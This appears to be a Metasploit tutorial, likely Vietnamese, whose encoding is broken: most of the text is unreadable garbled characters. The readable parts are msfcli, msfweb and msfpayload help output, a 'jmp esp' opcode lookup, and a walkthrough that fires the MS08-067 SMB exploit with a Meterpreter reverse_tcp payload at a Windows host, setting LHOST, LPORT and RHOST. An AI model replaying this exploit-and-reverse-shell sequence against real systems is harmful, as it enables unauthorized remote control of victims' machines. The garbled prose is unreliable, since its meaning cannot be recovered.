!"
#$
%&'()
*+,-$
+!./01+2
)",-#"31"$
45!6"
+!./"78++9
+!./"!":.
;01<"
+!./!6"
=>?@AB
Mc lc
"CD+AEF+G!9, H#9IJK#
L#"!
!"#$%%&'#(%)%*+,-#./01%-%2"&34
5%&)6789:;%'#<0.=+*,9>,5?,3@7:"A"BCB
%&0.$BDEFBBB9")%*G1%-H#.
789:0IB537#,;J ;K%B",&L%M%2,
.N%2,)+,=05%&"O,7"J3P;O,7"J3QR;STUV"A
%&" W 7: # 5?, 3@ 7: %5X Y0.' 3@7:5 O"&7
B&"33,;)7% 33
Z4D,), $%
(,8[D%%2,33\#]]^7,_&9>,%,'0+=60(
1,0.)`D,,D,%#"9,3aP2,+b.;""&9ZB""#+c
%& .34Y0I%,)6E:%3B",%d&#J"&D9&3,",#
N e39>,#(%#+,/0f+( H7L
)6%3B",%d&#J"&DgZdh9#(%#Y,/0#(%)
%*J,7"J3+ 8#%2,f%&9%.Y0.'30*%#%&
7,_;#i,5?,+M%0$&Hja%3B",%7"#"Ka>,34&+?,
6Zd]%%" (%,/B+-D,-#%&%"%E%,5#(%0(
#2Z4&#k%.#(%%&"f34D,)%l98I%%&"%?,,
m+b.
n,>,%,)09=%3B",%
%3B",%0IB#(%=gK&#J"&Dh"l%B%,)
9%4,)D,%L+?,+,-6#(%9D,
%1530j
^
MI1,H4.gB%,)hj#(%,'W0 !"#$%"A0
IBB%,)&#(%D!\7_ 8%%5X%&"Bm#=#
MI1KI!4Hg%,/%(hj,'W0 !"#$%%E ""
0IB
9K.IIgBb%Nhj,'W0"Af5?,D
%&'%"%/,>, k%+m0Bb%N+-Y+8D!\
D,%6111%-+5FD,%.DE.D,
%%eY,=07,6+"2#cD,%+5F%,'#9"
n,,+"2.G "M#9,)o,W7:7_ 8%
%5X
^ (NJK#OH,HKJPH#gB%%&,-D,%hj#(%b0%&!J",K"
fb0p,<0%&i+c+5FY+8;<0%&B%%&,-
D,% k%+m0q,=0.+L,p,34,-0 ,/%9=3b03k9=
%,6 (Y@r;#c33# .;+8s"KK3%3;9B."7
R HI#+gD,-#%&hj+b.,,+"2"7&D,-#%&#cD,
%+*,9>,=%!D0;1,789:g3&9,BDh;
"A"A !9,9%$#N1%-+*,9>, (Y@r
D0
t QHKH9IHgB%hjZ0D,D,%+5F%@,)#9
%E3*:%-m%,/%"1%4%,%E+c+5FY
+8;"7&3uB%D,%"A&,'%5"A%&'7,_+
E(Ps%"!;D,%3u+5F%,s
%3B",%#(%74 !"#$%#.%N0IB%E%,9=9I
+= !"#$%G5,lB+o9=D,-#%&Yb#$B9B%%&,-)
%*B%,)Yb# $B(%74"&I%, %,/6%3B",%
%3B",%d&#J"&D
R
%3B",%d&#J"&D#(%#E,%&5?7v+-D,-#%&;%IE9
D,%,63&9,%3B",%+5FYb.74%&'Ef5>
+*,%5F&;9>,f"#B"%3+5F9,/% H;33# &9.%"
%3B",%1%-2.%&'m0/%)+,=0j,0Y;O,7"J3;wZ
l%1%-7"J"75X%&%3B",%%2,JJJ#%3B",%"#
%3B",%+c+5F%NFB3x%&"[D%&DRy,' !#>,I%
6%3B",%9^Q
(%3*2/6=%!.j
• ,"7,)%&0.$B%eY63!Bz#.;6./0#3K,9
#3KJ ;DE0IB I%D#(%Y%45?,7v%eY";
91%-7{+/D,%3,
• |ED,%"%&'=J
H#9IJK#R49PHS4T
|,/%&l6%3B",%d&#J"&D
!"#$%&"'$
f%BmN%&"D,/%&l6#(%d&#J"&D "M#j
t
QHNj%BmX !I%6%" (D,/%&ld&#J"&D
yY9,/%%k%6y0 .}Y%3,", &&.;#(%%$BFB>B;
#"701%-+5F3@7: ~,B%%&,-+-B%%&,-
74"AE:"Zdg%3B",%d&#J"&Dh
R49PHS4T4HgD0•,hj "M##(%%$B)%*"
5#"70<0!r;<0!rB,';34D,)+,=0B*,ۥ,
G0IB"%#(%,"7,)%>,#"70;%,)N 30
6d&#J"&D|0•, "M#j
• Datastore: +5F,-05#(%#E,%&5?;1 "M##(%
,%&8 \#1%-+5F3@7: ~,#"70%#,/0
+/5X%&. H,%&8+,=0D,-[,/
#E,%&5?#(%%&"f,%&859$.;1+5F3@
7: ~,#"70D,%. ~,K&#J"&D+-Y
+8NY9,+5F%4,)
• Event Notification g%E "34D,)hj"BCB
B%%&,-+5&+(:%-9>,%e34D,).
+(Y!.&,#(%34D,)3u1#(%%WY@r
%5XW9>,1
• Framework Managers:1 ,)# 9: <0! r #"70;
B0,;333,"3;•" 3
R49PHS4T9IHgD0X3~hj+5FYb.7474%&'D0E
D6D0•,;0IB,"7,)+-1%-7_7%4%,
•,(%3*D0X3~j
• Configuration: 70.%&#(%I0,'%:9%0%$B
%E%,9=I0%&l6%,/%&,+A%;‚25%5
#:*6<0%&,+A%.%0(%ND
• Sessions:f%E%,X !9=9,)70.%&;D,-#3"%
9,%&"B,'#9,)65?,7v
• Logging:#(%%,)N6Zd"BCB,2,%E
%,;,;o,#(%%<0%9,"2%
ƒ
%0$%f%5?7v
(#$")*#(%#.<0C%(, (6%3B",%B*,FB#B9
#"70&,' ,)%6%3B",%+-<0C%9%&0.%#"/0DE1
YB"3"ADE%-<0C%7f,)0+-$B9"%3B",%"##0,%.; 2
1%-2.%&<0C%+-B%,)9%0%$B%E%,6"
+,$gD,%hW\N6Zd;,lB%%@,)#D,
%Bm#=#,#(%#"700IB#(%B5X%WD,
%;9+5FBb"2,&•&+*,9>,%e)+,=0G5B,' !
Bm#=#,)D,%%E%5?749"f+,-#./0.AB5j
,%& (+)#;,%&'W7:J gZ„T•%,";UZZ€h;,%&"
<0%&I0;%&,-D,)%*P9N7:D,%#(%,:%-Pe,"
7,)J 6Zdi}YB",%3
-.$/'"0 !"#$
P&"@3}YB",%#"703;i#(%YB",%%#0*%@,)#
D,%N7:~+b.%%@,)#D,%,,&"3"K%Z&9&Z&9,
y%,9%Z%D"&&0B%,"DB ,/6J,UZ
1")%*#%#0*D,%P0$%f"1%-+5F
,-0#(%#.%&2#+($B;#(%:##.%&2#;#(%7!,#2.%" (
#(%#2
…
2)$/g%!,%&ih#(%+"2#c+5FYb.74+-)%*%4%,
."7.+5F4i90IB ~,d&#J"&DN7:#(%""#"
#"#(%B."7;1%2"&#(%D/%*,%e#.2b%>,#.6D†%I
E;D†%IE1%-k9=#.%N2b%E<0D/%
*,(%B."7G1%-+5F,-0+X,!#(%3*b0)+5F
%4,)%&')+,=06#.2b(%3*B."7%5?+5F3@
7:B ,/530j
3!4#52)$/6#7/8
*"#(%,"7,)+,=0D,-;+5F0IB+- 2%4,)%&0.
$B%eY9"#.2b
*"$/"#(%%$Bb0)+5F3@7:5#(%B."7D,%4
,)D,%*"$/"%5?+5F9,/% HFBfg33# .h
!$/9"#(%Bm#c+($B.1%-Bm#=#H##~
&(W\6%3B",%d&#J"&D;"BCB 2%4,)+5F,=0
Q
%WX%&"<0%&D,%(%#"701%-#(%YB",%;#(%
B."7DE"2%+(€"2,6#"703uY+8+5F#:+N;W
\61N7:;#(%#"70"BCB#~&#(%#"%&'#.2b%
+1+5F",#(%#"70YB",%
:#""gkh+5FY##(%%Bm%&"%3B",%;+5F
7v+-%4,)?#(%D/%*,N7:j30D,#.2$ 8D,%;1
1%-+5FD-%*,+/#.%IE%E<0#2T%&%:#"".3u
Y@rD/%*,9?%&'#.%IE+-1%-+5FD/%*,2,9>,0
H)%*D,%
!""""#(%B."7%,'%,/+W\;0IB"l%
#(%3%5X%%e%&B&%&3l%1%-#f9,)5%!,
9=#(%%$B%,;I.+5F#c36#$%Dz06%,D"!5?,7v;.
Yb#$B9")%*#2%&B&%&2.%&' (>;99$.1DE
%- 8B%,) ~,m0/%)%*B%,)Yb#$B
1##(%+(#%3B",%"##0,%.1%-%4,);‚
25#(%#.<0C%;%IE &0%K"&;D,%;"A%2" ""
2$;" "M#%&%;%3D; ""97f,)0;#(%Bm6D,-#
%&Yb#$B(%$;"+2,7,)"#(%DE,#9,)# 23@7:
+-D,-#%&Yb#$B9I0# i,D,-#%&Yb#$B+=02.%e
%&"#(%$;"
9"0)#(%, !"#$%"A+,-#./0%&"#(%W7:.
)%*#3u%&~%#:%,'06fD†%IE(%)%* 8Yb#
$B1%-7{+/ 8#I%<0.=D,-#3"%;%IE%e*,789:;%&0.$B
7f,)0%&,BCB;+kB#$%Dz0;9%& (+)#
<9,"#W\#>,+5F 30%eB,' !9]; 30
#"70"9,)%#D,/#;%0%$B%E%,;%$#N7L%#
gK0‡‡,h9>,Bm#=#
n,"7,)6%3B",%
%3B",%0IB"l%,=0X#(%,"7,)+-%4,)
W\X !61n,"7,)6%3B",% "M#!,"7,)
]
+,=0D,-;7L).+Mi",&;,"7,).%,)N6
%3B",%d&#J"&D%5?+5F0IB%&4%,/B%E<0#W
\f%,)N.1%-&I%f07:"9,)B%,)D,%
6)%*#DEm3@7:%" (d&#J"&D
!#=$#$"+/.+5FY##E,%&5?#9,)B ,/I%6
%3B",%d&#J"&D91+5F+,"qb.#E,%&5?#9,),
"2%;9>,,=0%N\B"Bl;D!\0IBE:%&Ff0
7:"<0%&D,%3K"3"0IB%I%!%&"#(%,"7,);
m0/%%v.i9%,/%$B13x%&"d&#J"&Dl%1%-3@
7:%I%!#i,%W; "M#9,)'D/"2"<0%&D,%;%!,
#"70%&F;%4,)+,=0%&.%2"#(%,3%&
q- k%+m0#9,)%&',"7,)!*%$#$"%1%-3@7:)
cd /opt/metasploit/msf3/msfconsole;9%+5F,"7,)
#3@7:530j
>.$/!*%$#$"
!#=,"7,)"BCB2.%&4%,/B7L);"BCB0
5>+m0&%eE:D9"3K,9"D/%<0!&%&'E:
D10IB#(%3*%&F,lBX !+-5?,7v ,/%+5F/+(
#9,);%v.i.,1%-D,%+5F9>,b0)&#=?
root@bt:/opt/framework3/msf3# msfcli -h
Usage: /opt/framework3/msf3/msfcli <exploit_name><option=value>
[mode]
====================================================================
==========
Mode Description
(H)elp You're looking at it, baby!
(S)ummary Show information about this module
(O)ptions Show available options for this module
(A)dvanced Show available advanced options for this module
(I)DS Evasion Show available ids evasion options for this module
(P)ayloads Show available payloads for this module
(T)argets Show available targets for this exploit module
(AC)tions Show available actions for this auxiliary module
(C)heck Run the check routine of the selected module
(E)xecute Execute the selected module
root@bt:/opt/framework3/msf3#
!#='"0,"7,)+Mi%&'J 13x%&"Zd1DE0
IB %N \ !" #$%; 9 +5F D0./ DN 3@ 7: %&' #E, %&5?
O,7"J3q-1%-Y#%v.i%5XW9>,#3KJ %1%-7v
)30msfweb –h:
[root@RHL framework-3.0-alpha-r3]# ./msfweb -h
Usage: msfweb <options>
OPTIONS:
-a <opt> Bind to this IP address instead of loopback
-d Daemonize the web server
-h Help bannerww.syngress.com
-p <opt> Bind to this port instead of 55555
-v <opt> A number between 0 and 3 that controls log verbosity
",&l%G1%-D/%*,+/#.2b%E<0
%&70.)%J g"‡,d,&K"Y;T%&%}YB"&&;ZK&,h
!#=/"BCB#~&#(%,"7,)#2%&'#3K"3"P1%-%4
,)#3K7. HY+8+8sT9B"&%6#.#l%#0*
D/%*,%>,+-%4,)D,%q- ,/%%v.iW9>,#3K7%1%-
%4,))msfd –h:
@1A)B$&#=/
<&" 6%3B",%,"7,)+Mi%5X%9>,5?,7v
+5F%2" ~,yB07n,"7,).DI%5F9>,,=0%N\
B"Bl;+729#,_BN"5?,7v
q-D~,+(+5F,"7,)<&"%2.7L)armitage:
root@bt:/opt/framework3/msf3# armitage
",&l%1%-4i<&" H4i%&',"
7,)+Mi93u+5F,"7,)3@7:530j
C!D$/&"E&"9 F1
G.$/<&"
%3B",%0IB"5?,7v,#E,%&5?#9,)f0Nj
^
• n" }9,&"#%jb0)+5F%4%,%E<0)3%
903%;f"B%,"3+5F~+b.3u#%N%":;
+5F+59"%I%!#"70YB",%3
• P#B"&&.}9,&"#%j+5F%4%,%E<0,)3%9
03%;#E,%&5?.s+5F+59"#"70YB",%3++5F
%4%,;1DE!5~+/#"70YB",%3D
l%1%-502,#E,%&5?#+cI0%E<0)39
E,%&5?+13u+5F50%&"ˆ#3Kˆ"K,93u+5F%!,'%4,)%&~2,
D,,"7,)5?,7v%4,)1
^ b0)%&"#3K"3"
F j).7vD, 2#0*%"%&Dp,#"70 2+ci
%&5>+130D,"%E9,);"A#0*0 3#"70D
H").,lBD,-#%&Y#+cI0+l"YB",%5
"% ,/%D/%<0!#DEmB!,%4%,YB",%+15DEB!,%I%
!YB",%+=0%&F).
H$").+-D/%*,%>,#(%"3%9>,+8s,B9B"&%%5XW
I=$" ,/%f%E%,6#(%#"70.#(%YB",%"+1
,-%8%E%,X !I%; "M#"B%,"m%,/%
I0)."BCB%"%%&'#E,%&5?6&0 .
J$0#)." ,/%#"70+2.
:$/).+-"7#(%B0,%e#%3B",%B0,3
*",lB%%#D,/#YB",%;0Y,,&.;"7&g%&"+11L
%&F#(%3*D.J"&7,lB!,%,/D!\%#D,/#5j
|.J"&73j
• #j"703J,%#%,73&,B%,9#
• B%j"703J,%#%,B%"&&K&#
• B%K"&#j"703KK%,%,3B%K"&#
• B"&%j"703J,%#%,&#"%B"&%
• %.Bj"703"K3B,K,%.BgYB",%;0Y,,&.;"&B"3%h
• BBj"703%%&,%"&3&9&%%D3
• 0%"&j"703J&,%% .%,30%"&
R
• 9j"703J,%#%,}T
• ,7j"703J,%#%,[0%&<T
• "397 j"703J,%#%,wZ[T
• 7 j"703J,%#%,}YB",%‰[T
*"##$#).,)%D'%I%!333,"+%M%2,;333,"~+b.1
%-63"A#%&B&%&
*")"BCB%I0YB",%€
K#"5F2,9>,)#"
*"%&"<0%&%4,)%IE#(%#:%,'0;"A,=0#:
%,'0;%1%-7v#(%YB",%"A,=0YB",%).1rŠ%"
:;Š11,)049>,%I%!YB",%
*$' )."BCB,)%8%v.%"%#3*+,%"1/0
`3"Ja%1,-%8%I%!#"701%&"#%B",%K&#J"&DL
/0`3"JYB",%3a%1s,)%8YB",%1%&"#"70YB",%#
%E,P5X%45#"70D;)3"JL"%%I.%#3*
%0(%N
K#").+-i97v#(%YB",%;0Y,,&.€
%$B)%&" B."7#%&B&%& j
• %#"BCB0B"797"J"7K,3%e&#"%#,
• L" "BCBY#%E%,#26&#"%#,5T;
&"0%%
• 2$"##"BCB%2"B&"333#>,%&'&#"%#,
• *)#j"BCBY#%E%,)%*6&#"%#,
• Z@7:b0)j
• 9#"M&&$/9"N&$/9"N&$/9"-OMPOM/P
b0)037v+-"7f#"70#~&(6#%&B&%&5j
d3;%;&"33
• $/0M=0)OM"POM/"Pj"BCB"7%59,)
6&#"%#,3
• "/ "Q/ O"P j " BCB Y# 7f ,)0 6 &#"%
#,%&'+D/%*,
t
• '""Q/"BCB,7f,)0'&#"%#,
• $#""Q/j+1#+cD/%*,9>,&#"%"#B0%&
• ""Q/ [k%+m0#(%B,'#9,)9>,9e
%,/%$B9>,&#"%#,
• )"O&""#Pjc"7f,)0+5F@,,f"3%
9&#"%#,
• //"$)j,*)76"##7,
• "'/j" ,/%%5#:+#9,),)%2,
• #O="Q#Pj,)%D'%5#:9%$B%,
• 9$/#O#P/#j0B"7K,
• /$'$/#O#P/#j7"J"7K,
• Z@7:#"70+-Y# !+8%0./6&#"%#,j
L"
I$=
R$9"
• $='/OMPOM://POM$POM$#POM$PO
M2Pj"BCB%2"B"&%K"&J&7,f"3%9&#"%#,
• Z@7:#"70&"33j
","9"M=="OM#POMP
b0)Y0%"BCB 2%2"&#(%B&"33#>,%&'
&#"%#,93@7:B&"33+1+-D,%7f,)0
• ///- j 0‹fB&"333+2.%&'#.
&#"%#,
• #j,)%D'fB&"336&#"%#,
• Z@7:#"70Z.3j
"9/j" ,/%03&#,)%2,6&#"%#,
#)#=$j" ,/%%E%,9="#B0%&#;wZ
R %,)N%&F%&"%3B",%
ƒ
%3B",%L%&F%'#"5?,7v%,)NB:9:%*%"
<0%&%4,)D,%f%,)N6%3B",%+5F0IB"
5?, 7v %&4 %,/B %&' ," 7,) 9>, f %N \ +A ,)% 6
d&#J"&Df%,)N.0Ef0N%&"%&5?FB%4,)
D,%+A ,)%
!#=)$/ #(% %,) N 6 %3B",% " BCB l % %2"
Z"7;#c%4%,9,=0Xf"9,)%4,)D,% '
",d&#J"&D,Z"71%-+5F%2"&9>,f+872D
05j;y0 .;Œ9Z&,B%;.%$#N!,30[3,"W
7:Z0D,l%+cY+8&•+5F+m0&#"#0*;%1%-%4
,)•%&4%,/BB."7+19"%$B%,P+-DN"2%9%4,)
<0%&D,%q-Y#+5F%,)N1%-4i"9,)D,%;
l%1%-3@7:)msfpayload –hj
root@bt:/# msfpayload –h
Z"7+5F%2"& ~,#3KB."79>,+m.+6#i,W\;5
%&"+11W#(%3* .%05ŽY]]ŽY]ŽY]7+,=0.3u%2"&
#cD,-#%&%&5>D,%4%,5X%&.B9oI0%&lB."7",
&;3"73u+,<0#(%#25>,#275>,72&%Y%59$.+"2
#c%4%,.1%- 8B%,) ~,)%*TZ.Bm#=#*
9,&03q-,!,<0./%9I+=.;B%%&,-6%3B",%0IB
&#="$/";1%-,lB+"2#c%4%,6l%%&+5F34B%,)
6)%*TZ.Bm#=#7,)%9,&03 H#c1+"2#c
+1 +- l DE L 1 Dr %4 `%M,a l % 1 %- $B )
msfencode –h+-Y##(%73%v.i6&#="$/"
P,) N 3#•3& 1 %- 7v D, l % #0* # " #c
33# .1rŠ;+A ,)%%&"D,B%%&,-D,%;l%mY
+8"B"7g%$B)#.h+-+5"%&"b0)33# .
N7:jD,l%2.E:9.'0m0#c#.6)jmp espj
root@bt:/opt/framework3/msf3/tools# ./nasm_shell.rb
nasm >jmp esp
…
00000000 FFE4 jmp esp
U!.#4V"T"9#"W1,LH#9IJK#
q-%4,)D,%6 I%D•#(%#.";%1%-%4
,)%E<0 5>X !30j
ST9)&U!"#$
X4P9#9#"H4+gP0%$B%E%,hjl%1%-3@
7:E:5,3"9&.3;YB"33.#(%E
:+5F0IB ~,%3B",%"##0,%.+-%0+5F#(%
73#:%,'01%-D,%.789:+2.;
+#~+-D/%*,+5F+/#.2b
(NJK#9#g|,%hj%4,)D,%l%1%-3@
7:#"70,lBD,%%4+(.%4,)D,%
%6E+-D~,+(#(%0(%IE+/#.2b
",&;%1%-%4,)0(%IE"%+A<0.=
.%&0.$B%eY9"#.2b
I#Y(NJK#9#gZ0D,%hj1%-3@7:%'#E
:D+-%0%$B+5F%'#%E%,%e#.2bg%e+11
%-I.+5F%E%,#$%;.%E%,9=+,-#./06)
%*##.2b+%#,h
^ QHJ4#+g[""hj3@7:E:,lB ""+-%2"&
#(% "",%,/%D/%<0!D,%+5F%&'#.2b
R KH9+Jg#32hj3@7: I%D•#(%E:SB
"+12,%I%+5F#~&+-%4,)"#:%,'0
D,%%&'#.2bgDE,B:2,,+A%*%&'
#.2bh
^ =#IZ1+1[T"9#"W1K\"F+]*P^#
^ "&T#B%
Q
"&T#B%+5F%NFB9"m0/%#.<0C%;"BCB
l%$D/%<0!<0C%9%4,)D,%+-D,-#%&;Y+8
q- !"9),)0<0!)%*;l%mB!,1,/5F<0!r
%*%;B!, "M#%e<0C%+/DkB:$0<0!j
• „0C%#.6#2;#.%&2#;%5?@;%,/% 8+8%0./
9W7:D0"
• U+8b.&#*,+7i%434")%*#2
6l%
• U+8%+(%,=#%6#%D,%
+5F
• ‘0%,'9%4,)f4DkB:$0<0!
"&T#B%+5F"#(%E:7v"9,)D,%
X%#D,/#11D!\%4+($B$%fD,
% !"#$%g}YB",%3h,).;#(%B,' !"&T#B%1,
D"!]]]]SZ
^ 93
93#(%E:D,%%5X#2,%e9,%6
T##0,%.3;%,/%D/9>,D,/%&l#~"BCB+BW+5F0m0
&,'D,D,%,)%2,1 "M#X^Q]YB",%3;%&0 #,%
%'#^YB",%%&FD,%%&'%I%!=%!;W7:B ,/
",&;93L"BCBl%#0%'#f#"70D5
,30ZB",%0,"BCB%4,)%"%,)0<0!%&',"7,)+M
i;"BCBD,%,‡&"‰7.
]
^ 3303
[+m0;3303#(%740M#~`3303&"•%a;+5F+=Y0I%
~,y07&,3"9"\#QQ…;#c0M6%Bm+=0+5F
ED,gB,' !3303%&~9=%&5>hPe%]\#]]R;
P %J"&DZ0&,%.;#(%E%.7"y07&,3"+M3$B+c
B%330375>,72#c0M+133031%-2.%&',=0
=%!)+,=0D0; "M#!STU;TSU;wZU;
O,7"J31E:%#D,/#+5F%4,)%"s7{6
B0,
"CD+?EU!_#,"9#"W1K\"F+,LH#9IJK#
"V"T"9#"W1
!V
qb.#(%%IE+5F%4,) '%&"#2g"&
%J"&DhP&"%&';D†%IE3u+W~#.Qt…3u%,/
%IE9D,%,%&'#.1+8sQt…Y"+1%&"
#2
P&" "".;1#3u3@7:,Z]…•]tƒ•%B,g}‰]]…‰
^R]hqb.#(%Bb%NlBB%&"#c+5?7{ki6
%T76#.6789:1%-"BCBD†%IE%4%,#c%e
Yq- ,/%%'#,%,/%9=.%1%-•)30%&"#%3B",%
>use exploit/windows/smb/ms08_067_netapi
>info
• „0C%)+,=07v&"
P1%-i&"%&'#06[D%&D575>,j
!D&"EF1
"AG1%-7v)30%&'@37L)+-i,&"
armitage
Z0D,,"7,)6 &" +5F $%';%i%&'#06
5X%&530$#W&#W#X*(B%"2,,)'%$B9"
+8 s T 6 #: %,'0; 1 %- 7!, "A #(% +8 s T
N7:%$BjQt…]ˆ^+5F530j
-*9Y9Z&)$&[
W1K"`Ca1IbO[+,G!W#4V"T"9#"W1
%3B",%/+(7L)
q-9"/+(7L)%•j
>msfconsole
q-3@7:",$%7v)j
>use exploit/windows/smb/ms08_067_netapi
P,/B%"%i)$/%NFB+-7vD,%j
>set payload windows/meterpreter/reverse_tcp
’+b.%i)$/.%#.%IE3u~/+(?;
?D/%*,+/%e#. 8%IE
P,/B%"%7v)3"J"B%,"3+-Y#%E3*m
%,/%")$/9",$
>show options
Z0D,$B)%&'%%3u%I.+5F%E3*m%,/%
5$#N$N$#N$N"
^
$#q8sT6#.%IE
$%&'#.%IE+-kD/%*,
$#q8sT6#. 8%IE
$789:%&'#. 8%IEg#A+8%&"",$
.^^Rh
")+,=0 8%IE;#A+8+-%4+(%#
>set lhost 192.168.1.12
>set lport 4455 (đặt tùy ý)
>set rhost 192.168.1.x
%#3*L2,%+-#A+8
0*,v•)",$+-%,/D,%
>exploit
%3B",%%&"/+(+Mi
1#3u3@7:&"%&"Bm.n•7L)75>,+b.+-
D~,2.&"
>armitage
q-Y#,%,/%9=9,)D,%,%&'&#=$#$"9&"#?,
2Y#9,7"7#"+,D•#9>, !J"&7
c#G!*I9!T"T"9#"W1
Z0D,D,%9>,&#=$#$"%+c,/#+5F<0.=+,=0D,-
6#.9,%,#;5^75>,+b.
R